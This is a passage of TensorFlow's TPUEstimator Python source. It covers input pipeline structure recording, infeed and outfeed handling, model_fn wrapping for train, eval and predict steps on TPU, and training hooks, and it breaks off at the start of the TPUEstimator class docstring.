supported by TF nest (namely, dict, tuples, namedtuples or any nested
structure of such of Tensors). `labels` could be `None` as well.
These are flattened before they are passed to the infeed/outfeed library
as that expectes flattend lists.
"""
class InputsStructureRecorder(object):
"""The recorder to record inputs structure."""
def __init__(self, input_partition_dims=None):
# Holds the structure of inputs
self._feature_structure = {}
self._flattened_input_dims = None
if input_partition_dims:
# This should have been validated in TPUConfig.
assert len(input_partition_dims) <= 2, 'must have 1 or 2 elements.'
if len(input_partition_dims) == 2:
self._feature_dims, self._label_dims = input_partition_dims
else:
self._feature_dims = input_partition_dims[0]
self._label_dims = None
assert self._feature_dims is not None, ('input_partition_dims[0] must '
'not be None')
else:
self._feature_dims = None
self._label_dims = None
# Internal state.
self._initialized = False
@property
def flattened_input_dims(self):
assert self._initialized, 'InputsStructureRecorder is not initialized.'
return self._flattened_input_dims
def has_labels(self):
return 'labels' in self._feature_structure
def _flatten_input_dims(self, feature_dims, feature_dims_names, label_dims,
label_dims_names, label_names, has_labels):
"""Flatten input dims with the same order as flattened input tensors."""
flattened_input_dims = []
if feature_dims_names:
# We need a fixed ordering for matching the tensors in features.
flattened_input_dims.extend(
[feature_dims[name] for name in feature_dims_names])
else:
flattened_input_dims.append(feature_dims)
if label_dims_names:
# We need a fixed ordering for matching the tensors in labels.
flattened_input_dims.extend(
[label_dims[name] for name in label_dims_names])
else:
if label_names:
num_tensors_in_label = len(label_names)
else:
num_tensors_in_label = int(has_labels)
# Setting `None` in input_partition_dims[1] will apply `None` to
# all the tensors in labels, regardless of internal structure.
flattened_input_dims.extend([label_dims] * num_tensors_in_label)
return flattened_input_dims
def validate_and_record_structure(self, features, labels):
"""Validates and records the structure of `features` and `labels`."""
# Extract structure.
has_labels = labels is not None
feature_names = _extract_key_names(features)
label_names = _extract_key_names(labels)
if not self._initialized:
# Record structure.
self._initialized = True
if self._feature_dims is not None:
feature_dims_names = _extract_key_names(self._feature_dims)
if feature_dims_names != feature_names:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched feature'
' keys. Expected {}, got {}'.format(feature_names,
feature_dims_names))
label_dims_names = _extract_key_names(self._label_dims)
if self._label_dims is not None and label_dims_names != label_names:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched label'
' keys. Expected {}, got {}'.format(label_names,
label_dims_names))
self._flattened_input_dims = self._flatten_input_dims(
self._feature_dims, feature_dims_names, self._label_dims,
label_dims_names, label_names, has_labels)
def flatten_features_and_labels(self, features, labels, signals=None):
"""Flattens the `features` and `labels` to a single tensor list."""
self._feature_structure['features'] = features
if labels is not None:
self._feature_structure['labels'] = labels
if signals is not None:
self._feature_structure['signals'] = signals
return data_nest.flatten(self._feature_structure)
def unflatten_features_and_labels(self, flattened_inputs):
"""Restores the flattened inputs to original features and labels form.
Args:
flattened_inputs: Flattened inputs for each shard.
Returns:
A tuple of (`features`, `labels`), where `labels` could be None.
Each one, if present, should have identical structure (single tensor vs
dict) as the one returned by input_fn.
Raises:
ValueError: If the number of expected tensors from `flattened_inputs`
mismatches the recorded structure.
"""
unflattened_inputs = data_nest.pack_sequence_as(self._feature_structure,
flattened_inputs)
return _Inputs(
unflattened_inputs['features'],
unflattened_inputs.get('labels'),
signals=unflattened_inputs.get('signals'))
def __init__(self, input_fn, batch_axis, ctx):
"""Constructor.
Args:
input_fn: input fn for train or eval.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards.
ctx: A `_InternalTPUContext` instance with mode.
Raises:
ValueError: If both `sharded_features` and `num_cores` are `None`.
"""
self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder(
ctx.input_partition_dims)
self._sharded_per_core = ctx.is_input_sharded_per_core()
self._input_fn = input_fn
self._infeed_queue = None
self._ctx = ctx
self._batch_axis = batch_axis
def generate_infeed_enqueue_ops_and_dequeue_fn(self):
"""Generates infeed enqueue ops and dequeue_fn."""
# While tf.while_loop is called, the body function, which invokes
# `enqueue_fn` passed in, is called to construct the graph. So, input_fn
# structure is recorded.
enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = (
self._invoke_input_fn_and_record_structure())
self._validate_input_pipeline()
def dequeue_fn():
"""dequeue_fn is used by TPU to retrieve the tensors."""
# In the model-parallel case, both the host-side and device-side
# computations must agree on the core on which infeed takes place. We
# choose to perform infeed on logical core 0 of each replica.
values = self._infeed_queue.generate_dequeue_op(tpu_device=0)
# The unflatten process uses the structure information recorded above.
return self._inputs_structure_recorder.unflatten_features_and_labels(
values)
return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator)
def _invoke_input_fn_and_record_structure(self):
"""Deploys the input pipeline and record input structure."""
enqueue_ops = []
infeed_queues = []
all_dataset_initializers = []
num_hosts = self._ctx.num_hosts
tpu_host_placement_fn = self._ctx.tpu_host_placement_function
run_infeed_loop_on_coordinator = True
if self._sharded_per_core:
# Per-Core input pipeline deployment.
# Invoke input pipeline for each core and placed on the corresponding
# host.
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
enqueue_ops_fn, captured_infeed_queue = (
generate_per_core_enqueue_ops_fn_for_host(
self._ctx, self._input_fn, self._inputs_structure_recorder,
host_device, host_id))
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
run_infeed_loop_on_coordinator = False
enqueue_ops.append(
_wrap_computation_in_while_loop(
device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
# Infeed_queue_getter must be called after enqueue_ops_fn is called.
infeed_queues.append(captured_infeed_queue.get())
elif self._ctx.is_input_broadcast_with_iterators():
# Only calls input_fn in host 0.
host_device = tpu_host_placement_fn(host_id=0)
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_broadcast_enqueue_ops_fn(self._ctx, self._input_fn,
self._inputs_structure_recorder,
num_hosts))
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
else:
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
if self._ctx.is_input_per_host_with_iterators():
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_v2_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, host_device, host_id))
else:
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, self._batch_axis,
host_device, host_id))
# NOTE(xiejw): We dispatch here based on the return type of the
# users `input_fn`.
#
# 1. If input_fn returns a Dataset instance, we initialize the
# iterator outside of tf.while_loop, and call the iterator.get_next
# inside tf.while_loop. This should be always safe.
#
# 2. If input_fn returns (features, labels), it is too late to wrap
# them inside tf.while_loop, as resource initialization cannot be
# handled in TF control flow properly. In this case, we will use
# python loop to enqueue the data into TPU system. This may be
# slow compared to the previous case.
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(
wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
# infeed_queue is used to generate dequeue ops. The only thing it uses for
# dequeue is dtypes and types. So, any one can be used. Here, grab the
# first one.
self._infeed_queue = infeed_queues[0]
return enqueue_ops, [
util_lib.MultiHostDatasetInitializerHook(all_dataset_initializers)
], run_infeed_loop_on_coordinator
def _validate_input_pipeline(self):
"""Validates the input pipeline.
Perform some sanity checks to log user friendly information. We should
error out to give users better error message. But, if
_WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior), we cannot break
user code, so, log a warning.
Raises:
RuntimeError: If the validation failed.
"""
if ops.get_default_graph().get_collection(ops.GraphKeys.QUEUE_RUNNERS):
err_msg = ('Input pipeline contains one or more QueueRunners. '
'It could be slow and not scalable. Please consider '
'converting your input pipeline to use `tf.data` instead (see '
'https://www.tensorflow.org/guide/datasets for '
'instructions.')
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
raise RuntimeError(err_msg)
else:
logging.warn(err_msg)
def call_computation(computation,
experimental_exported_model_uses_all_cores=True):
"""Call computation.
computation uses a single-core for TPU inference. If
`experimental_exported_model_uses_all_cores` is `True`, this function will
round-robin
computation among all TPU cores visible to the host; otherwise, it will use
a single core.
Args:
computation: A Python function that takes no inputs and builds computation
graph. If `computation` returns m outputs, this function will return a
list of m Tensors.
experimental_exported_model_uses_all_cores: Whether to round-robin among all
cores visible to the host, or to use a single core.
Returns:
A list of output tensors.
"""
if experimental_exported_model_uses_all_cores:
# Using `TPUPartitionedCall` makes it possible to target a different
# TPU core with every `Session.run()` call. Note that the entire inference
# graph executes on a single core, and that invocations of this graph
# will round-robin among the cores attached to a host.
@function.Defun()
def tpu_subgraph():
return computation()
return tpu_functional.TPUPartitionedCall(
args=tpu_subgraph.captured_inputs,
device_ordinal=tpu_ordinal_selector_op.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_subgraph.definition.signature.output_arg],
f=tpu_subgraph)
else:
return computation()
class _ModelFnWrapper(object):
"""A `model_fn` wrapper.
This makes calling model_fn on CPU and TPU easier and more consistent and
performs necessary check and mutation required by TPU training and evaluation.
In addition, this wrapper manages converting the `model_fn` to a single TPU
train and eval step.
"""
def __init__(self, model_fn, config, params, ctx):
self._model_fn = model_fn
self._config = config
self._params = params
self._ctx = ctx
def call_without_tpu(self, features, labels, is_export_mode):
return self._call_model_fn(features, labels, is_export_mode=is_export_mode)
def _add_embedding_features(self, features):
if self._ctx.embedding_config:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
embedding_activations = tpu_embedding_.get_activations()
features.update(embedding_activations)
def convert_to_single_tpu_train_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single train step on TPU.
The user provided `model_fn` takes input tuple
(features, labels) and produces the EstimatorSpec with train_op and loss for
train `mode`. This usually represents a single train computation on CPU.
For TPU training, a train (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input should be taken from TPU infeed rather
than input pipeline (input_fn) directly. To fit TPU loop and replicate
pattern, the original train computation should be reformed, which is the
returned `train_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of train_fn, host_calls, and captured scaffold_fn. The train_fn
representing the train step for TPU.
"""
host_call = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_training_hooks = _CapturedObject()
def train_step(loss):
"""Training step function for use inside a while loop."""
del loss # unused; required in function signature.
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features)
estimator_spec = self._verify_estimator_spec(
self._call_model_fn(features, labels))
loss, train_op = estimator_spec.loss, estimator_spec.train_op
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
captured_scaffold_fn.capture(estimator_spec.scaffold_fn)
else:
captured_scaffold_fn.capture(None)
captured_training_hooks.capture(estimator_spec.training_hooks)
tracing_ops = []
if tensor_tracer.TensorTracer.is_enabled():
tt = tensor_tracer.TensorTracer()
loss, tracing_ops = tt.trace_tpu(ops.get_default_graph(),
loss, train_op,
self._ctx.num_replicas,
self._ctx.num_of_replicas_per_host,
self._ctx.num_hosts)
if self._ctx.embedding_config is None:
apply_sparse_grads = []
else:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
apply_sparse_grads = [tpu_embedding_.generate_send_gradients_op()]
# We must run train_op to update the variables prior to running the
# outfeed.
with ops.control_dependencies([train_op] + tracing_ops +
apply_sparse_grads):
host_call_outfeed_ops = []
if (isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec) # pylint: disable=protected-access
and estimator_spec.host_call is not None):
host_call.record({'host_call': estimator_spec.host_call})
host_call_outfeed_ops = host_call.create_enqueue_op()
with ops.control_dependencies(host_call_outfeed_ops):
return array_ops.identity(loss)
return (train_step, host_call, captured_scaffold_fn,
captured_training_hooks)
def convert_to_single_tpu_eval_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single eval step on TPU.
Similar to training, the user provided `model_fn` takes input tuple
(features, labels) and produces the TPUEstimatorSpec with eval_metrics for
eval `mode`. This usually represents a single evaluation computation on CPU.
For TPU evaluation, a eval (computation) step is first wrapped in a
tf.while_loop control flow to repeat for many times and then replicated to
all TPU shards. Besides the input and output are slightly different. Input,
features and labels, should be taken from TPU infeed rather than input
pipeline (input_fn) directly. Output is managed in two stages. First, the
model outputs as the result of evaluation computation, usually model logits,
should be transferred from TPU system to CPU. Then, all model outputs are
concatenated first on CPU and sent to the metric_fn for metrics computation.
To fit TPU evaluation pattern, the original eval computation should be
reformed, which is the returned `eval_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of eval_fn, host_calls, and captured scaffold_fn. The eval_fn
representing the eval step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_eval_hooks = _CapturedObject()
def eval_step(total_loss):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features)
tpu_estimator_spec = self._call_model_fn(features, labels)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU evaluation must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
loss = tpu_estimator_spec.loss
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_eval_hooks.capture(tpu_estimator_spec.evaluation_hooks)
to_record = {}
if tpu_estimator_spec.eval_metrics:
to_record['eval_metrics'] = tpu_estimator_spec.eval_metrics
if tpu_estimator_spec.host_call is not None:
# We assume that evaluate won't update global step, so we don't wrap
# this host_call.
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return math_ops.add(total_loss, loss)
return eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
def convert_to_single_tpu_predict_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single predict step on TPU.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of predict_fn, host_calls, and captured scaffold_fn. The
predict_fn representing the predict step for TPU.
"""
host_calls = _OutfeedHostCall(self._ctx)
captured_scaffold_fn = _CapturedObject()
captured_predict_hooks = _CapturedObject()
def predict_step(unused_scalar_stopping_signal):
"""Evaluation step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
stopping_signals = inputs.signals()
assert stopping_signals is not None, (
'Internal Error: `signals` is missing.')
tpu_estimator_spec = self._call_model_fn(
features, labels, is_export_mode=False)
if not isinstance(tpu_estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
raise RuntimeError(
'estimator_spec used by TPU prediction must have type'
'`TPUEstimatorSpec`. Got {}'.format(type(tpu_estimator_spec)))
self._verify_tpu_spec_predictions(tpu_estimator_spec.predictions)
captured_scaffold_fn.capture(tpu_estimator_spec.scaffold_fn)
captured_predict_hooks.capture(tpu_estimator_spec.prediction_hooks)
to_record = {}
identity_fn = lambda **kwargs: kwargs
to_record['predictions'] = [identity_fn, tpu_estimator_spec.predictions]
to_record['signals'] = [identity_fn, stopping_signals]
if tpu_estimator_spec.host_call is not None:
to_record['host_call'] = tpu_estimator_spec.host_call
host_calls.record(to_record)
with ops.control_dependencies(host_calls.create_enqueue_op()):
return _StopSignals.as_scalar_stopping_signal(stopping_signals)
return (predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks)
def _verify_tpu_spec_predictions(self, predictions):
"""Validates TPUEstimatorSpec.predictions dict."""
# TODO(xiejw): Adds validation for prediction dictionrary.
# TODO(xiejw): Adds support for single tensor as predictions.
if not isinstance(predictions, dict):
raise TypeError('TPUEstimatorSpec.predictions must be dict of Tensors.')
for (key, tensor) in predictions.items():
if tensor.shape.dims[0].value is None:
raise ValueError(
'The tensor with key ({}) in TPUEstimatorSpec.predictions has '
'dynamic shape (should be static). Tensor: {}'.format(key, tensor))
return predictions
def _validate_model_features_and_labels(self, features, labels,
is_export_mode):
"""Validates that the features and labels for the model function are valid.
A valid features/labels object is the one with:
- Type: A tensor or any nested structure of tensors supported by TF nest,
namely nested dictionary, tuple, namedtuple, or sequence of tensors.
- Static shape if is_export_mode is False.
Args:
features: the features that would be input to the model function.
labels: the labels that would be input to the model function.
is_export_mode: boolean value specifying if in export mode.
Raises:
TypeError: If features/labels are not of the correct type.
ValueError: If features/labels have dynamic shape.
"""
def validate(obj, obj_name):
"""Helper validate function."""
if is_export_mode or self._ctx.is_running_on_cpu(is_export_mode):
return
if isinstance(obj, ops.Tensor):
if not obj.get_shape().is_fully_defined():
raise ValueError(
'The {} to the model returned by input_fn must have static shape.'
' Tensor: {}'.format(obj_name, obj))
else:
for tensor in data_nest.flatten(obj):
if not tensor.get_shape().is_fully_defined():
raise ValueError(
('The {} to the model returned by input_fn must have static '
'shape. Tensor: {}').format(obj_name, tensor))
validate(features, 'features')
if labels is not None:
validate(labels, 'labels')
def _call_model_fn(self, features, labels, is_export_mode=False):
"""Calls the model_fn with required parameters."""
self._validate_model_features_and_labels(features, labels, is_export_mode)
model_fn_args = function_utils.fn_args(self._model_fn)
kwargs = {}
# Makes deep copy with `config` and params` in case user mutates them.
config = copy.deepcopy(self._config)
params = copy.deepcopy(self._params)
if 'labels' in model_fn_args:
kwargs['labels'] = labels
elif labels is not None:
raise ValueError(
'model_fn does not take labels, but input_fn returns labels.')
if 'mode' in model_fn_args:
kwargs['mode'] = self._ctx.mode
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
if 'params' not in model_fn_args:
raise ValueError('model_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params[\'batch_size\']'.format(self._model_fn))
if is_export_mode:
batch_size_for_model_fn = None
else:
batch_size_for_model_fn = self._ctx.batch_size_for_model_fn
if batch_size_for_model_fn is not None:
_add_item_to_params(params, _BATCH_SIZE_KEY, batch_size_for_model_fn)
running_on_cpu = self._ctx.is_running_on_cpu(is_export_mode)
_add_item_to_params(params, _USE_TPU_KEY, not running_on_cpu)
if not running_on_cpu:
user_context = tpu_context.TPUContext(
internal_ctx=self._ctx, call_from_input_fn=False)
_add_item_to_params(params, _CTX_KEY, user_context)
estimator_spec = self._model_fn(features=features, **kwargs)
if (running_on_cpu and
isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec)): # pylint: disable=protected-access
# The estimator_spec will be passed to `Estimator` directly, which expects
# type `EstimatorSpec`.
return estimator_spec.as_estimator_spec()
else:
return estimator_spec
def _verify_estimator_spec(self, estimator_spec):
"""Validates the estimator_spec."""
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
return estimator_spec
err_msg = '{} returned by EstimatorSpec is not supported in TPUEstimator.'
if estimator_spec.training_chief_hooks:
raise ValueError(
err_msg.format('training_chief_hooks') + 'If you want' +
' to pass training hooks, please pass via training_hooks.')
if estimator_spec.scaffold:
logging.warning('EstimatorSpec.Scaffold is ignored by TPU train/eval. '
'Please use TPUEstimatorSpec.')
return estimator_spec
class _OutfeedHostCall(object):
"""Support for `eval_metrics` and `host_call` in TPUEstimatorSpec."""
def __init__(self, ctx):
self._ctx = ctx
self._names = []
# All of these are dictionaries of lists keyed on the name.
self._host_fns = {}
self._tensor_keys = collections.defaultdict(list)
self._tensors = collections.defaultdict(list)
self._tensor_dtypes = collections.defaultdict(list)
self._tensor_shapes = collections.defaultdict(list)
@staticmethod
def validate(host_calls):
"""Validates the `eval_metrics` and `host_call` in `TPUEstimatorSpec`."""
for name, host_call in host_calls.items():
if not isinstance(host_call, (tuple, list)):
raise ValueError('{} should be tuple or list'.format(name))
if len(host_call) != 2:
raise ValueError('{} should have two elements.'.format(name))
if not callable(host_call[0]):
raise TypeError('{}[0] should be callable.'.format(name))
if not isinstance(host_call[1], (tuple, list, dict)):
raise ValueError('{}[1] should be tuple or list, or dict.'.format(name))
if isinstance(host_call[1], (tuple, list)):
fullargspec = tf_inspect.getfullargspec(host_call[0])
fn_args = function_utils.fn_args(host_call[0])
# wrapped_hostcall_with_global_step uses varargs, so we allow that.
if fullargspec.varargs is None and len(host_call[1]) != len(fn_args):
raise RuntimeError(
'In TPUEstimatorSpec.{}, length of tensors {} does not match '
'method args of the function, which takes {}.'.format(
name, len(host_call[1]), len(fn_args)))
@staticmethod
def create_cpu_hostcall(host_calls):
"""Runs on the host_call on CPU instead of TPU when use_tpu=False."""
_OutfeedHostCall.validate(host_calls)
ret = {}
for name, host_call in host_calls.items():
host_fn, tensors = host_call
if isinstance(tensors, (tuple, list)):
ret[name] = host_fn(*tensors)
else:
# Must be dict.
try:
ret[name] = host_fn(**tensors)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
return ret
def record(self, host_calls):
"""Records the host_call structure."""
for name, host_call in host_calls.items():
host_fn, tensor_list_or_dict = host_call
self._names.append(name)
self._host_fns[name] = host_fn
if isinstance(tensor_list_or_dict, dict):
for (key, tensor) in six.iteritems(tensor_list_or_dict):
self._tensor_keys[name].append(key)
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
else:
# List or tuple.
self._tensor_keys[name] = None
for tensor in tensor_list_or_dict:
self._tensors[name].append(tensor)
self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
def create_enqueue_op(self):
"""Create the op to enqueue the recorded host_calls.
Returns:
A list of enqueue ops, which is empty if there are no host calls.
"""
if not self._names:
return []
tensors = []
# TODO(jhseu): Consider deduping tensors.
for name in self._names:
tensors.extend(self._tensors[name])
with ops.device(tpu.core(0)):
return [tpu_ops.outfeed_enqueue_tuple(tensors)]
def create_tpu_hostcall(self):
"""Sends the tensors through outfeed and runs the host_fn on CPU.
The tensors are concatenated along dimension 0 to form a global tensor
across all shards. The concatenated function is passed to the host_fn and
executed on the first host.
Returns:
A dictionary mapping name to the return type of the host_call by that
name.
Raises:
RuntimeError: If outfeed tensor is scalar.
"""
if not self._names:
return {}
ret = {}
# For each i, dequeue_ops[i] is a list containing the tensors from all
# shards. This list is concatenated later.
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for name in self._names:
for _ in self._tensors[name]:
dequeue_ops.append([])
for dtype in self._tensor_dtypes[name]:
tensor_dtypes.append(dtype)
for shape in self._tensor_shapes[name]:
tensor_shapes.append(shape)
# Outfeed ops execute on each replica's first logical core. Note: we must
# constraint it such that we have at most one outfeed dequeue and enqueue
# per replica.
for i in xrange(self._ctx.num_replicas):
host_device, ordinal_id = self._ctx.device_for_replica(i)
with ops.device(host_device):
outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes,
shapes=tensor_shapes,
device_ordinal=ordinal_id)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
# Deconstruct dequeue ops.
flat_dequeue_ops = []
for l in dequeue_ops:
flat_dequeue_ops.extend(l)
dequeue_ops_by_name = {}
pos = 0
for name in self._names:
dequeue_ops_by_name[name] = dequeue_ops[pos:pos +
len(self._tensors[name])]
pos += len(self._tensors[name])
def _call_host_fn(fn, *args, **kw):
context = CatchInvalidHostcallFunctions()
context.Enter()
result = fn(*args, **kw)
context.Exit()
context.ExitResult(result)
return result
# It is assumed evaluation always happens on single host TPU system. So,
# place all ops on tpu host if possible.
#
# TODO(jhseu): Evaluate whether this is right for summaries.
with ops.device(self._ctx.tpu_host_placement_function(replica_id=0)):
for name in self._names:
dequeue_ops = dequeue_ops_by_name[name]
for i, item in enumerate(dequeue_ops):
if dequeue_ops[i][0].shape.ndims == 0:
raise RuntimeError(
'All tensors outfed from TPU should preserve batch size '
'dimension, but got scalar {}'.format(dequeue_ops[i][0]))
# TODO(xiejw): Make the specification of the outfeed combinaton
# function more explicit and well-documented. We may want to give the
# user the option of concatenating along any axis.
if (self._ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST):
# If the infeed is in BROADCAST mode (each core recieving the same
# input), then we assume that the cores also produce identical
# copies of the same output, and we simply take the output from
# the first core. This mode is used by Mesh-TensorFlow.
with ops.control_dependencies(dequeue_ops[i]):
dequeue_ops[i] = array_ops.identity(dequeue_ops[i][0])
else:
# Assume that the input has been batch-split and that axis 0 of the
# output tensors represents the batch size. Concatenate along
# the axis 0 to re-combine the batch.
dequeue_ops[i] = array_ops.concat(dequeue_ops[i], axis=0)
if self._tensor_keys[name] is not None:
# The user-provided eval_metrics[1] is a dict.
dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops))
try:
ret[name] = _call_host_fn(self._host_fns[name], **dequeue_ops)
except TypeError as e:
logging.warning(
'Exception while calling %s: %s. It is likely the tensors '
'(%s[1]) do not match the '
'function\'s arguments', name, e, name)
raise
else:
ret[name] = _call_host_fn(self._host_fns[name], *dequeue_ops)
# force all dequeue operations to be run if not consumed by the host calls
ret['__force_dequeue'] = control_flow_ops.group(*flat_dequeue_ops)
return ret
class _OutfeedHostCallHook(session_run_hook.SessionRunHook):
"""Hook to run host calls when use_tpu=False."""
def __init__(self, tensors):
self._tensors = tensors
def begin(self):
# We duplicate this code from the TPUInfeedOutfeedSessionHook rather than
# create a separate hook to guarantee execution order, because summaries
# need to be initialized before the outfeed thread starts.
# TODO(jhseu): Make a wrapper hook instead?
self._init_ops = contrib_summary.summary_writer_initializer_op()
# Get all the writer resources from the initializer, so we know what to
# flush.
self._finalize_ops = []
for op in self._init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def after_create_session(self, session, coord):
session.run(self._init_ops)
def before_run(self, run_context):
return basic_session_run_hooks.SessionRunArgs(self._tensors)
def end(self, session):
session.run(self._finalize_ops)
class ExamplesPerSecondHook(basic_session_run_hooks.StepCounterHook):
"""Calculate and report global_step/sec and examples/sec during runtime."""
def __init__(self,
batch_size,
every_n_steps=100,
every_n_secs=None,
output_dir=None,
summary_writer=None):
self._batch_size = batch_size
super(ExamplesPerSecondHook, self).__init__(
every_n_steps=every_n_steps,
every_n_secs=every_n_secs,
output_dir=output_dir,
summary_writer=summary_writer)
def _log_and_record(self, elapsed_steps, elapsed_time, global_step):
global_step_per_sec = elapsed_steps / elapsed_time
examples_per_sec = self._batch_size * global_step_per_sec
if self._summary_writer is not None:
global_step_summary = Summary(value=[
Summary.Value(tag='global_step/sec', simple_value=global_step_per_sec)
])
example_summary = Summary(value=[
Summary.Value(tag='examples/sec', simple_value=examples_per_sec)
])
self._summary_writer.add_summary(global_step_summary, global_step)
self._summary_writer.add_summary(example_summary, global_step)
logging.info('global_step/sec: %g', global_step_per_sec)
logging.info('examples/sec: %g', examples_per_sec)
class InstallSignalHandlerHook(session_run_hook.SessionRunHook):
"""Change SIGINT (CTRL^C) handler to force quit the process.
The default behavior often results in hanging processes.
The original handler is restored after training/evaluation.
"""
def __init__(self):
self._signal_fn = signal.getsignal(signal.SIGINT)
def before_run(self, run_context):
signal.signal(signal.SIGINT, signal.SIG_DFL)
def end(self, session):
signal.signal(signal.SIGINT, self._signal_fn)
class TPUEstimator(estimator_lib.Estimator):
"""Estimator with TPU support.
TPUEstimator also supports training on CPU and GPU. You don't need to define
a separate `tf.estimator.Estimator`.
TPUEstimator handles many of the details of running on TPU devices, such as
replicating inputs and models for each core, and returning to host
periodically to run hooks.
TPUEstimator transforms a global batch size in params to a per-shard batch
size when calling the `input_fn` and `model_fn`. Users should specify
global batch size in constructor, and then get the batch size for each shard
in `input_fn` and `model_fn` by `params['batch_size']`.
- For training, `model_fn` gets per-core batch size; `input_fn` may get
per-core or per-host batch size depending on `per_host_input_for_training`
in `TPUConfig` (See docstring for TPUConfig for details).
- For evaluation and prediction, `model_fn` gets per-core batch size and
`input_fn` get per-host batch size.
Evaluation
==========
`model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics`
for TPU evaluation. However, if eval_on_tpu is False, `model_fn` must return
`EstimatorSpec` and the evaluation will execute on CPU or GPU; in this case
the following discussion on TPU evaluation does not apply.
`TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`tensors` could be a list of any nested structure of `Tensor`s (See
`TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns
a dict from metric string name to the result of calling a metric function,
namely a `(metric_tensor, update_op)` tuple.
One can set `use_tpu` to `False` for testing. All training, evaluation, and
predict will be executed on CPU. `input_fn` and `model_fn` will receive
`train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`.
Current limitations:
--------------------
1. TPU evaluation only works on a single host (one TPU worker) except
BROADCAST mode.
2. `input_fn` for evaluation should **NOT** raise an end-of-input exception
(`OutOfRangeError` or `StopIteration`). And all evaluation steps and all
batches should have the same size.
Example (MNIST):
----------------
```
# The metric Fn which runs on CPU.
